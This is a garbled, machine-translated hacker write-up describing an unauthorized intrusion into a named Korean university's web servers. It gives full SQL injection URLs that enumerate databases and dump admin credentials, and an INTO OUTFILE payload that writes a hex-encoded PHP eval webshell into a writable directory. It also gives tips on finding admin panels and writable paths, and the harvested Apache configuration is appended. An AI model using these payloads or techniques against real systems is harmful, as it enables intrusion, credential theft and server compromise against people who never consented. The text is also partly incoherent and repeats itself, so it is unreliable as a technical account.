A summary of the experiences of a Linux Server intrusion in Korea

I forgot who sent an injection point in the group. It seems that I am doing security testing on foreign countries, especially South Korea. At that time, it was a simple injection point: http: ship. iuk. ac. krsub5_4.php? Seq-1 + union + select + 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 get data: shiproot@localhost5.0

 

I forgot who sent an injection point in the group. It seems that I am doing security testing on foreign countries, especially South Korea. At that time it was a very simple injection point: http://ship.iuk.ac.kr/ SuB5_4. Php? Seq =-1 + union + select + 1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 get data: ship root @ localhost 5.0.51a-community-log get Database: http://ship.iuk.ac.kr/sub5_4.php? Seq =-1 + union + select +, GROUP_CONCAT (DISTINCT + table_schema), + from + info RmAtion_schema. ColUmns information_schema, JIU_WEB, arch, autoe, beauty, biz, cs, docman, ece, ecse, EdU, eee, ese, fashion, fire, fn, food, Free, Fs, fsc, fund, gteri, haksa_db, japan, jimuse, jkufw, klc, media, mysql, nr, omi, omi_new, pa, pt, radi, sanhak, semu, ship, spe, sports a database table: http://ship.iuk.ac.kr/sub5_4.php? Seq =-1 + union + select +, GROUP_CONCAT (DISTINCT + table_name, 16, 17 + from + information_schema.columns + where + table_schema = 0x72616469 admin, free, job, notice, pds, photo, plan, popup, qna, sche DuLe, TimeGet data: http://ship.iuk.ac.kr/sub5_4.php? Seq =-1 + union + select +, GROUP_CONCAT (DISTINCT + column_name, 16, 17 + from + information_schema.columns + where + table_name = 0x61646D696E in general, the above steps are no problem, it is simply an annoying old man who is familiar with the road. But the problem arises. 1. Although it is the root permission, the hash of MySQL is not unlocked at the time. Even if it is unlocked, MySQL. the host in the user does not have the % 2 permission. Although it is the root permission, it cannot be written into webshell3. Although the password is provided, it cannot be found in the background, I want to talk about my experience with South Korean websites. My personal opinion is: the appearance seems to be useless, but the path is not correct, difficulties: 1. Difficult to find in the background; 2. Difficult to find in the background when uploading webshells. Because it is a website in South Korea PHPMostly, PHP websites are mostly deployed on Linux servers, and Linux paths are case sensitive. Sometimes, if the admin background is Admin, you will crash. In addition, for example, phpmyadmin, if the default name is phpMyAdmin, you still need to renew it. Furthermore, there are not many background projects using the admin path on the kr station I have seen. I don't know why. Many background names are borad. Although it is hard to understand, but fortunately, because the login passwords in the background of many kr stations are too simple to die, admin/1234 and others cannot upload webshellLinux files and directories, in this regard, the administrator of the kr website is very qualified. Websites rarely have Writable Directories. Therefore, the chances of a website being written into webshell are greatly reduced. However, if the content of a website needs to be updated, do not write webshell in a wishful way and find writable directories, don't write a directory. Some folders named upload may not be writable, And the directories of fckeditor may not have writable paths. I used a chicken program like fck on a Chinese website to get used to webshell. On the kr website, I saw this chicken program and learned how to upload webshell. As a result, the upload failed because of a vulnerability. Dude, Linux servers are like domestic servers. Can they be written anywhere? In fact, this Website won the review because of its experience, so it never queries the same ip site in five minutes. The first station is http://radi.iuk.ac.kr/adminand then the last station is admin.pdf. Check the third-level domain name and the database name injected above. The database on this site should be radi. Continue to inject the table admin, Field IdAnd PasswdHttp://ship.iuk.ac.kr/sub5_4.php? Seq =-1 + union + select +, GROUP_CONCAT (DISTINCT + id, 0x5f, passwd), + from + radi. in this way, you can get radio and 111radio. The next step is to go to the background to find a writable directory (do not worry about finding a place to upload webshell. In most cases, you cannot upload PHP backdoors, even if the upload function is available, the upload fails because the directory cannot be written .) According to this address http://radi.iuk.ac.kr/editor/ I Nc/ DdImage. php? Img_path =/home/radi/public_html/admin/job/IMG directly exposes the physical Writable Path. Know/home/radi/public_html/admin/job/IMG can be written but pay attention to case sensitive since the database is root permission, then I'm welcome to use the http://ship.iuk.ac.kr/sub5_4.php? Seq =-1 + union + select + 0x3C3F706870206576616C28245F504F53545B2763275D293F3E + into + out File+ '/Home/radi/public_html/admin/job/IMG/bbb. php 'gets a webshell URL: http://radi.iuk.ac.kr/admin/job/img/bbb.php?network environment apache/2.0.61 (Unix) DAV/2 PHP/4.4.7 older website environments... Find the configuration file of Apache. The path is found here:/usr/local/apache-2.0.61/conf/ HttpdFind the domain name ship. iuk. ac. kr in. conf and obtain the configuration information: SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/ship/public_html ServerName ship. iuk. ac. kr Find the writable directory and execute Cp CommandYou can get webshell. However, in this case, cp is actually just getting rid of your pants and fart. The permissions on files on Korean Linux Hosts are so strict that even if you get a website webshell, it is useless because it cannot be changed. If you want to raise the right to death, isn't the cp equal to the above? Appendix: Apache configuration file SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/ece/public_html ServerName ece. iuk. ac. kr ServerAlias m1.adbank. co. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/ese/public_html ServerName ese. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/spe/public_html ServerName spe. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/edu/public_html ServerName edu. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/jkufw/public_html ServerName jkufw. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/pa/public_html ServerName pa. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/semu/public_html ServerName semu. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/media/public_html ServerName hospital. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/biz/public_html ServerName biz. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/gteri/public_html ServerName hotel. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/japan/public_html ServerName japan. iuk. ac. kr SetEnvIfNoCase Request_URI ". (bmp | gif | jpg | jpeg | png | css | js | java) $ "not_log CustomLog/usr/local/apache/logs/class. log combined env =! Not_log DocumentRoot/home/food/public_html ServerName food. iuk. ac. kr